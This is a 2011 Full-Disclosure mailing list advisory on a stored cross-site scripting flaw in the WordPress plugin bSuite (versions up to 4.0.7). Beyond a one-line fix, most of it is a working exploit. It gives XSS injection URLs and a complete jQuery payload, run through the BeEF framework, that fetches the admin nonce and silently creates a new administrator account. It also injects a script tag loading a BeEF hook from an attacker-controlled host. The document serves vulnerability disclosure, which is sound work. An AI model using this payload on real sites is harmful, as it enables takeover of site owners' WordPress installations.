[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] bsuite <= 4.0.7 Permanent XSS (Remote add admin) - Wordpress plugin

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] bsuite <= 4.0.7 Permanent XSS (Remote add admin) - Wordpress plugin
From: R00T_ATI <r00t_ati@xxxxxxxxxx>
Date: Mon, 18 Jul 2011 23:18:07 +0200

<html>
  <head>

    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-15">
  </head>
  <body bgcolor="#FFFFFF" text="#000000">
    Original advisory:
    <a class="moz-txt-link-freetext" 
href="http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/";>http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/</a><br>
    <br>
    <p><strong>WordPress bSuite &lt;= 4.0.7 Permanent XSS -&gt; Add
        Admin</strong><br>
      <strong>Download link:</strong>
      <a class="moz-txt-link-freetext" 
href="http://wordpress.org/extend/plugins/bsuite/";>http://wordpress.org/extend/plugins/bsuite/</a><br>
      <strong> Author contact:</strong> 29/06/2011<br>
      <strong>POC published:</strong> 11/07/2011<br>
      Plugin is out-of-date, last update on 2009, so this is just a POC
      that show how to made the XSS more useful <img
        src="cid:part1.01040902.03010603@ihteam.net" alt=";)"
        class="wp-smiley"> </p>
    <p><strong>FIX:</strong> Add htmlspecialchars to output</p>
    <p><strong>Bug found by:</strong> IHTeam<br>
      Simone `R00T_ATI` Quatrini<br>
      Marco `white_sheep` Rondini<br>
      Francesco `merlok` Morucci<br>
      Mauro `epicfail` Gasperini</p>
    <p><strong>Follow us on Twitter! <a
          href="http://twitter.com/IHTeam";>@IHTeam</a></strong></p>
    <p><strong>CHECK BSUITE:</strong></p>
    <p><a class="moz-txt-link-freetext" 
href="http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js";>http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js</a></p>
    <p><strong>PERMANENT XSS POC:</strong><br>
      You can inject XSS in different way, for example:</p>
    <p><a class="moz-txt-link-freetext" 
href="http://192.168.1.100/wordpress/?s=";>http://192.168.1.100/wordpress/?s=</a>&lt;h2&gt;XSSED&lt;/h2&gt;</p>
    <p>or directly in URL:</p>
    <p><a class="moz-txt-link-freetext" 
href="http://192.168.1.100/wordpress/?p=1&amp;";>http://192.168.1.100/wordpress/?p=1&amp;</a>&lt;h1&gt;XSSED&lt;/h1&gt;</p>
    <p>Now, when admin enter in bSuite panel, will see the XSSED code<br>
      <a
        href="http://www.ihteam.net/wp-content/uploads/bsuite_XSSED.jpeg";><br>
      </a></p>
    <p><strong>XSS TO REMOTE ADMIN ADD:<br>
      </strong>We will use <a href="http://beefproject.com/";
        target="_blank">beef </a>to do that part. So:</p>
    <ol>
      <li>Run beef on you local machine</li>
      <li>Enable auto-run that code:</li>
    </ol>
    <blockquote>
      <p>jQuery(&#8220;&lt;div&gt;&#8221;, {<br>
        id: &#8220;testbeef&#8221;<br>
        }).appendTo(&#8220;#screen-meta-links&#8221;);<br>
        jQuery.get(&#8220;user-new.php&#8221;, function(data) {<br>
        jQuery(&#8220;#testbeef&#8221;).html(data);<br>
        var nonce=jQuery(&#8220;#_wpnonce_create-user&#8221;).val();<br>
        jQuery(&#8220;#testbeef&#8221;).html(&#8220;&#8221;);</p>
      <p>jQuery.post(&#8220;user-new.php&#8221;, {<br>
        &#8220;_wp_http_referer&#8221;: 
&#8220;/wordpress/wp-admin/user-new.php&#8221;,<br>
        &#8220;_wpnonce_create-user&#8221;: nonce,<br>
        action: &#8220;createuser&#8221;,<br>
        createuser: &#8220;Add New User&#8221;,<br>
        email: &#8220;<a class="moz-txt-link-abbreviated" 
href="mailto:hax0rmail@xxxxxxxx";>hax0rmail@xxxxxxxx</a>&#8221;,<br>
        first_name: &#8220;&#8221;,<br>
        last_name: &#8220;&#8221;,<br>
        pass1: &#8220;123123hello&#8221;,<br>
        pass2: &#8220;123123hello&#8221;,<br>
        role: &#8220;administrator&#8221;,<br>
        url: &#8220;&#8221;,<br>
        user_login: &#8220;hax0r&#8221;<br>
        });</p>
      <p>});</p>
    </blockquote>
    <p>We make 2 request to <em>/wordpress/wp-admin/user-new.php</em>
      because we need to grab <em>_wpnonce_create-user</em> value.</p>
    <ol>
      <li>First create a new div with ID <em>testbeef</em></li>
      <li>Request user-new.php and append content to the DIV</li>
      <li>Grab _wpnonce_create-user value to nonce variable</li>
      <li>Clean the DIV content;</li>
      <li>Make a POST request to user-new.php with the correct values</li>
    </ol>
    <p>Review the code to change  _wp_http_referer, pass1, pass2 and
      user_login of the POST request.<br>
      Now it&#8217;s time to inject the beef control script in bSuite like
      this:</p>
    <p><a class="moz-txt-link-freetext" 
href="http://192.168.1.100/s=";>http://192.168.1.100/s=</a>&lt;script
      src=&#8221;<a class="moz-txt-link-freetext" 
href="http://192.168.1.102/beef/hook/beefmagic.js.php&#8221;";>http://192.168.1.102/beef/hook/beefmagic.js.php&#8221;</a>&gt;&lt;/script&gt;</p>
    You may wait 1h to 5h for bSuit refresh. It will result in new admin
    with username: <em>haxor</em> and password: <em>123123hello</em><br>
  </body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
Next by Date: [Full-disclosure] wp-e-commerce <= 3.8.4 Sql injection - Wordpress plugin
Previous by thread: [Full-disclosure] [ MDVSA-2011:114 ] blender
Next by thread: [Full-disclosure] wp-e-commerce <= 3.8.4 Sql injection - Wordpress plugin
Index(es):
- Date
- Thread